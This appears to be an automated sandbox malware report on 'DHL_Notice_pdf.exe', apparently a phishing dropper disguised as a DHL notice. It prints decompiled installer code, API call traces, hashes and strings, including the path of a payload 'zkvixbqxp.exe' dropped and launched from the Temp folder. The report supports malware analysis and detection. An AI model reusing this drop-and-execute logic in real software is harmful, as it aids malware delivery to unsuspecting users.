                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040699E(WCHAR* _a4) {
                                                            				void* _t2;
                                                            
                                                            				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                            				if(_t2 == 0xffffffff) {
                                                            					return 0;
                                                            				}
                                                            				FindClose(_t2);
                                                            				return 0x426798;
                                                            			}





                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                            				struct HWND__* _v28;
                                                            				void* _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t34;
                                                            				signed int _t36;
                                                            				signed int _t38;
                                                            				struct HWND__* _t48;
                                                            				signed int _t67;
                                                            				struct HWND__* _t73;
                                                            				signed int _t86;
                                                            				struct HWND__* _t91;
                                                            				signed int _t99;
                                                            				int _t103;
                                                            				signed int _t117;
                                                            				int _t118;
                                                            				int _t122;
                                                            				signed int _t124;
                                                            				struct HWND__* _t127;
                                                            				struct HWND__* _t128;
                                                            				int _t129;
                                                            				intOrPtr _t130;
                                                            				long _t133;
                                                            				int _t135;
                                                            				int _t136;
                                                            				void* _t137;
                                                            				void* _t145;
                                                            
                                                            				_t130 = _a8;
                                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                                            					_t34 = _a12;
                                                            					_t127 = _a4;
                                                            					__eflags = _t130 - 0x110;
                                                            					 *0x423730 = _t34;
                                                            					if(_t130 == 0x110) {
                                                            						 *0x42a268 = _t127;
                                                            						 *0x423744 = GetDlgItem(_t127, 1);
                                                            						_t91 = GetDlgItem(_t127, 2);
                                                            						_push(0xffffffff);
                                                            						_push(0x1c);
                                                            						 *0x421710 = _t91;
                                                            						E004045C4(_t127);
                                                            						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                            						 *0x42922c = E0040140B(4);
                                                            						_t34 = 1;
                                                            						__eflags = 1;
                                                            						 *0x423730 = 1;
                                                            					}
                                                            					_t124 =  *0x40a39c; // 0x0
                                                            					_t136 = 0;
                                                            					_t133 = (_t124 << 6) +  *0x42a280;
                                                            					__eflags = _t124;
                                                            					if(_t124 < 0) {
                                                            						L36:
                                                            						E00404610(0x40b);
                                                            						while(1) {
                                                            							_t36 =  *0x423730;
                                                            							 *0x40a39c =  *0x40a39c + _t36;
                                                            							_t133 = _t133 + (_t36 << 6);
                                                            							_t38 =  *0x40a39c; // 0x0
                                                            							__eflags = _t38 -  *0x42a284;
                                                            							if(_t38 ==  *0x42a284) {
                                                            								E0040140B(1);
                                                            							}
                                                            							__eflags =  *0x42922c - _t136;
                                                            							if( *0x42922c != _t136) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                            							if(__eflags >= 0) {
                                                            								break;
                                                            							}
                                                            							_t117 =  *(_t133 + 0x14);
                                                            							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                            							_push(0xfffffc19);
                                                            							E004045C4(_t127);
                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                            							_push(0xfffffc1b);
                                                            							E004045C4(_t127);
                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                            							_push(0xfffffc1a);
                                                            							E004045C4(_t127);
                                                            							_t48 = GetDlgItem(_t127, 3);
                                                            							__eflags =  *0x42a2ec - _t136;
                                                            							_v28 = _t48;
                                                            							if( *0x42a2ec != _t136) {
                                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                            								__eflags = _t117;
                                                            							}
                                                            							ShowWindow(_t48, _t117 & 0x00000008);
                                                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                            							E004045E6(_t117 & 0x00000002);
                                                            							_t118 = _t117 & 0x00000004;
                                                            							EnableWindow( *0x421710, _t118);
                                                            							__eflags = _t118 - _t136;
                                                            							if(_t118 == _t136) {
                                                            								_push(1);
                                                            							} else {
                                                            								_push(_t136);
                                                            							}
                                                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                            							__eflags =  *0x42a2ec - _t136;
                                                            							if( *0x42a2ec == _t136) {
                                                            								_push( *0x423744);
                                                            							} else {
                                                            								SendMessageW(_t127, 0x401, 2, _t136);
                                                            								_push( *0x421710);
                                                            							}
                                                            							E004045F9();
                                                            							E00406668(0x423748, E004040A6());
                                                            							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                            							SetWindowTextW(_t127, 0x423748);
                                                            							_push(_t136);
                                                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                            							__eflags = _t67;
                                                            							if(_t67 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								__eflags =  *_t133 - _t136;
                                                            								if( *_t133 == _t136) {
                                                            									continue;
                                                            								}
                                                            								__eflags =  *(_t133 + 4) - 5;
                                                            								if( *(_t133 + 4) != 5) {
                                                            									DestroyWindow( *0x429238);
                                                            									 *0x422720 = _t133;
                                                            									__eflags =  *_t133 - _t136;
                                                            									if( *_t133 <= _t136) {
                                                            										goto L60;
                                                            									}
                                                            									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                            									__eflags = _t73 - _t136;
                                                            									 *0x429238 = _t73;
                                                            									if(_t73 == _t136) {
                                                            										goto L60;
                                                            									}
                                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                            									_push(6);
                                                            									E004045C4(_t73);
                                                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                            									ScreenToClient(_t127, _t137 + 0x10);
                                                            									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                            									_push(_t136);
                                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                            									__eflags =  *0x42922c - _t136;
                                                            									if( *0x42922c != _t136) {
                                                            										goto L63;
                                                            									}
                                                            									ShowWindow( *0x429238, 8);
                                                            									E00404610(0x405);
                                                            									goto L60;
                                                            								}
                                                            								__eflags =  *0x42a2ec - _t136;
                                                            								if( *0x42a2ec != _t136) {
                                                            									goto L63;
                                                            								}
                                                            								__eflags =  *0x42a2e0 - _t136;
                                                            								if( *0x42a2e0 != _t136) {
                                                            									continue;
                                                            								}
                                                            								goto L63;
                                                            							}
                                                            						}
                                                            						DestroyWindow( *0x429238); // executed
                                                            						 *0x42a268 = _t136;
                                                            						EndDialog(_t127,  *0x421f18);
                                                            						goto L60;
                                                            					} else {
                                                            						__eflags = _t34 - 1;
                                                            						if(_t34 != 1) {
                                                            							L35:
                                                            							__eflags =  *_t133 - _t136;
                                                            							if( *_t133 == _t136) {
                                                            								goto L63;
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						_push(0);
                                                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                            						__eflags = _t86;
                                                            						if(_t86 == 0) {
                                                            							goto L35;
                                                            						}
                                                            						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                            						__eflags =  *0x42922c;
                                                            						return 0 |  *0x42922c == 0x00000000;
                                                            					}
                                                            				} else {
                                                            					_t127 = _a4;
                                                            					_t136 = 0;
                                                            					if(_t130 == 0x47) {
                                                            						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                            					}
                                                            					_t122 = _a12;
                                                            					if(_t130 != 5) {
                                                            						L8:
                                                            						if(_t130 != 0x40d) {
                                                            							__eflags = _t130 - 0x11;
                                                            							if(_t130 != 0x11) {
                                                            								__eflags = _t130 - 0x111;
                                                            								if(_t130 != 0x111) {
                                                            									goto L28;
                                                            								}
                                                            								_t135 = _t122 & 0x0000ffff;
                                                            								_t128 = GetDlgItem(_t127, _t135);
                                                            								__eflags = _t128 - _t136;
                                                            								if(_t128 == _t136) {
                                                            									L15:
                                                            									__eflags = _t135 - 1;
                                                            									if(_t135 != 1) {
                                                            										__eflags = _t135 - 3;
                                                            										if(_t135 != 3) {
                                                            											_t129 = 2;
                                                            											__eflags = _t135 - _t129;
                                                            											if(_t135 != _t129) {
                                                            												L27:
                                                            												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                            												goto L28;
                                                            											}
                                                            											__eflags =  *0x42a2ec - _t136;
                                                            											if( *0x42a2ec == _t136) {
                                                            												_t99 = E0040140B(3);
                                                            												__eflags = _t99;
                                                            												if(_t99 != 0) {
                                                            													goto L28;
                                                            												}
                                                            												 *0x421f18 = 1;
                                                            												L23:
                                                            												_push(0x78);
                                                            												L24:
                                                            												E0040459D();
                                                            												goto L28;
                                                            											}
                                                            											E0040140B(_t129);
                                                            											 *0x421f18 = _t129;
                                                            											goto L23;
                                                            										}
                                                            										__eflags =  *0x40a39c - _t136; // 0x0
                                                            										if(__eflags <= 0) {
                                                            											goto L27;
                                                            										}
                                                            										_push(0xffffffff);
                                                            										goto L24;
                                                            									}
                                                            									_push(_t135);
                                                            									goto L24;
                                                            								}
                                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                            								_t103 = IsWindowEnabled(_t128);
                                                            								__eflags = _t103;
                                                            								if(_t103 == 0) {
                                                            									L63:
                                                            									return 0;
                                                            								}
                                                            								goto L15;
                                                            							}
                                                            							SetWindowLongW(_t127, _t136, _t136);
                                                            							return 1;
                                                            						}
                                                            						DestroyWindow( *0x429238);
                                                            						 *0x429238 = _t122;
                                                            						L60:
                                                            						_t145 =  *0x425748 - _t136; // 0x0
                                                            						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                            							ShowWindow(_t127, 0xa);
                                                            							 *0x425748 = 1;
                                                            						}
                                                            						goto L63;
                                                            					} else {
                                                            						asm("sbb eax, eax");
                                                            						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                            							L28:
                                                            							return E0040462B(_a8, _t122, _a16);
                                                            						} else {
                                                            							ShowWindow(_t127, 4);
                                                            							goto L8;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                            • ShowWindow.USER32(?), ref: 00404121
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                            • DestroyWindow.USER32 ref: 00404160
                                                            • SetWindowLongW.USER32 ref: 00404179
                                                            • GetDlgItem.USER32 ref: 00404198
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                            • GetDlgItem.USER32 ref: 0040425E
                                                            • GetDlgItem.USER32 ref: 00404268
                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                            • GetDlgItem.USER32 ref: 00404379
                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                            • EnableWindow.USER32(?,?), ref: 004043AC
                                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                            • EnableMenuItem.USER32 ref: 004043E4
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: H7B
                                                            • API String ID: 2475350683-2300413410
                                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Figure: control-flow graph of the function at 00403D17; nodes are marked Executed or Not Executed]
                                                            C-Code - Quality: 96%
                                                            			E00403D17(void* __eflags) {
                                                            				intOrPtr _v4;
                                                            				intOrPtr _v8;
                                                            				int _v12;
                                                            				void _v16;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t22;
                                                            				void* _t30;
                                                            				void* _t32;
                                                            				int _t33;
                                                            				void* _t36;
                                                            				int _t39;
                                                            				int _t40;
                                                            				int _t44;
                                                            				short _t63;
                                                            				WCHAR* _t65;
                                                            				signed char _t69;
                                                            				WCHAR* _t76;
                                                            				intOrPtr _t82;
                                                            				WCHAR* _t87;
                                                            
                                                            				_t82 =  *0x42a270;
                                                            				_t22 = E00406A35(2);
                                                            				_t90 = _t22;
                                                            				if(_t22 == 0) {
                                                            					_t76 = 0x423748;
                                                            					L"1033" = 0x30;
                                                            					 *0x437002 = 0x78;
                                                            					 *0x437004 = 0;
                                                            					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                            					__eflags =  *0x423748;
                                                            					if(__eflags == 0) {
                                                            						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                            					}
                                                            					lstrcatW(L"1033", _t76);
                                                            				} else {
                                                            					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                            				}
                                                            				E00403FED(_t78, _t90);
                                                            				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                            				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                            				 *0x42a2fc = 0x10000;
                                                            				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                            					L16:
                                                            					if(E0040603F(_t98, _t86) == 0) {
                                                            						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                            					}
                                                            					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                            					 *0x429248 = _t30;
                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                            						L21:
                                                            						if(E0040140B(0) == 0) {
                                                            							_t32 = E00403FED(_t78, __eflags);
                                                            							__eflags =  *0x42a300;
                                                            							if( *0x42a300 != 0) {
                                                            								_t33 = E0040579D(_t32, 0);
                                                            								__eflags = _t33;
                                                            								if(_t33 == 0) {
                                                            									E0040140B(1);
                                                            									goto L33;
                                                            								}
                                                            								__eflags =  *0x42922c;
                                                            								if( *0x42922c == 0) {
                                                            									E0040140B(2);
                                                            								}
                                                            								goto L22;
                                                            							}
                                                            							ShowWindow( *0x423728, 5); // executed
                                                            							_t39 = E004069C5("RichEd20"); // executed
                                                            							__eflags = _t39;
                                                            							if(_t39 == 0) {
                                                            								E004069C5("RichEd32");
                                                            							}
                                                            							_t87 = L"RichEdit20W";
                                                            							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                            							__eflags = _t40;
                                                            							if(_t40 == 0) {
                                                            								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                            								 *0x429224 = _t87;
                                                            								RegisterClassW(0x429200);
                                                            							}
                                                            							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                            							E00403C67(E0040140B(5), 1);
                                                            							return _t44;
                                                            						}
                                                            						L22:
                                                            						_t36 = 2;
                                                            						return _t36;
                                                            					} else {
                                                            						_t78 =  *0x42a260;
                                                            						 *0x429204 = E00401000;
                                                            						 *0x429210 =  *0x42a260;
                                                            						 *0x429214 = _t30;
                                                            						 *0x429224 = 0x40a3b4;
                                                            						if(RegisterClassW(0x429200) == 0) {
                                                            							L33:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                            						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                            						goto L21;
                                                            					}
                                                            				} else {
                                                            					_t78 =  *(_t82 + 0x48);
                                                            					_t92 = _t78;
                                                            					if(_t78 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					_t76 = 0x428200;
                                                            					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                            					_t63 =  *0x428200; // 0x22
                                                            					if(_t63 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					if(_t63 == 0x22) {
                                                            						_t76 = 0x428202;
                                                            						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                            					}
                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                            						L15:
                                                            						E00406668(_t86, E00405F37(_t76));
                                                            						goto L16;
                                                            					} else {
                                                            						_t69 = GetFileAttributesW(_t76);
                                                            						if(_t69 == 0xffffffff) {
                                                            							L14:
                                                            							E00405F83(_t76);
                                                            							goto L15;
                                                            						}
                                                            						_t98 = _t69 & 0x00000010;
                                                            						if((_t69 & 0x00000010) != 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                                                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                            • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,00000000,?), ref: 00403E36
                                                            • LoadImageW.USER32 ref: 00403E7F
                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                            • RegisterClassW.USER32 ref: 00403EBC
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                            • CreateWindowExW.USER32 ref: 00403F09
                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                            • GetClassInfoW.USER32 ref: 00403F6B
                                                            • GetClassInfoW.USER32 ref: 00403F78
                                                            • RegisterClassW.USER32 ref: 00403F81
                                                            • DialogBoxParamW.USER32 ref: 00403FA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-1328062468
                                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Figure: control-flow graph of the function at 004030D0; nodes are marked Executed or Not Executed]
                                                            C-Code - Quality: 98%
                                                            			E004030D0(void* __eflags, signed int _a4) {
                                                            				DWORD* _v8;
                                                            				DWORD* _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				signed int _v40;
                                                            				short _v560;
                                                            				long _t54;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				intOrPtr _t65;
                                                            				void* _t68;
                                                            				intOrPtr* _t70;
                                                            				long _t82;
                                                            				signed int _t89;
                                                            				intOrPtr _t92;
                                                            				long _t94;
                                                            				void* _t102;
                                                            				void* _t106;
                                                            				long _t107;
                                                            				long _t110;
                                                            				void* _t111;
                                                            
                                                            				_t94 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				 *0x42a26c = GetTickCount() + 0x3e8;
                                                            				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x400);
                                                            				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x80000000, 3);
                                                            				 *0x40a018 = _t106;
                                                            				if(_t106 == 0xffffffff) {
                                                            					return L"Error launching installer";
                                                            				}
                                                            				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe");
                                                            				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
                                                            				_t54 = GetFileSize(_t106, 0);
                                                            				 *0x420f00 = _t54;
                                                            				_t110 = _t54;
                                                            				if(_t54 <= 0) {
                                                            					L24:
                                                            					E0040302E(1);
                                                            					if( *0x42a274 == _t94) {
                                                            						goto L32;
                                                            					}
                                                            					if(_v12 == _t94) {
                                                            						L28:
                                                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                            						_t111 = _t57;
                                                            						E00406B90(0x40ce68);
                                                            						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                            						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                            						 *0x40a01c = _t62;
                                                            						if(_t62 != 0xffffffff) {
                                                            							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                            							 *0x420f04 = _t65;
                                                            							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                            							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                            							if(_t68 == _v20) {
                                                            								 *0x42a270 = _t111;
                                                            								 *0x42a278 =  *_t111;
                                                            								if((_v40 & 0x00000001) != 0) {
                                                            									 *0x42a27c =  *0x42a27c + 1;
                                                            								}
                                                            								_t45 = _t111 + 0x44; // 0x44
                                                            								_t70 = _t45;
                                                            								_t102 = 8;
                                                            								do {
                                                            									_t70 = _t70 - 8;
                                                            									 *_t70 =  *_t70 + _t111;
                                                            									_t102 = _t102 - 1;
                                                            								} while (_t102 != 0);
                                                            								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                            								E00406113(0x42a280, _t111 + 4, 0x40);
                                                            								return 0;
                                                            							}
                                                            							goto L32;
                                                            						}
                                                            						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                            					}
                                                            					E004035F8( *0x420ef0);
